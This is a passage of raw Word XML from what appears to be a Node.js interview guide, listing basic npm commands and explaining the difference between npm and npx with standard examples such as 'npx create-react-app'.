          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: npm run &lt;script-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB5B34" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Update a package</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: npm update &lt;package-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0716AC78" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uninstall a package</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: npm uninstall &lt;package-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE32228" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>List installed packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: npm list or npm list -g for global packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6629CA1D" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D403B5"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12" w:name="_Toc178383195"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q12. What is the difference between npm and npx?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1CD8CC32"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NPM (Node Package Manager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E5A3A" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the default package manager for Node.js. It is used to install, manage, and publish packages (modules) to and from the NPM registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B784886"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Key Uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30831446" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Installing Packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD81DF" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>npm install &lt;package-name&gt;: Installs a package and adds it to the node_modules directory. If used with --save, it adds the package as a dependency in the package.json file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5C0395" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Managing Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B022E1E" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Manages dependencies by installing, updating, or uninstalling them as specified in the package.json file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAFF736" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Running Scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABA2F1" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executes predefined scripts, such as npm start, npm test, or custom scripts defined in the package.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D96C69A" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Publishing Packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DCDA0" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Allows developers to publish their packages to the NPM registry for others to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD63823"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50339C21"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npm install express</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F984A3"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npm run start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D625B93"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NPX (Node Package Executor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115FE1A2" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPX</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool that comes with npm (since version 5.2.0). It is used to execute binaries from Node.js packages, whether they are installed globally, locally, or not at all. NPX simplifies the process of using Node.js packages without requiring them to be installed globally or as a project dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265FC56A"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Key Uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43254AE0" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Running Binaries Without Installation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B64546" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can run a package without installing it permanently. For example, running npx create-react-app my-app will execute the create-react-app package without needing to install it globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C565C" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Running Local Binaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D9EFA6" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If a package is installed locally in a project, you can use npx to run its binaries without referencing node_modules/.bin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CB802E" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Version Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42014C7D" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPX can be used to run a specific version of a package without affecting other projects. For instance, you can run npx webpack@4.0.0 to test an older version of Webpack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E020D7" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Temporary Command Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58B23F" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPX allows you to run a one-time command without polluting your global environment with unnecessary packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BAE212"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691950BE"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npx create-react-app my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B75AC"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npx eslint . --fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E0980"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Key Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F27F3" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Primary Function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C74D1" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Primarily manages packages (installation, versioning, dependency management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A30BF" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPX</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Executes packages without needing a permanent installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDCD96B" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Installation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698DA307" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Installs packages to node_modules or globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4367B" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPX</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Runs packages without necessarily installing them permanently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119AFEF4" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
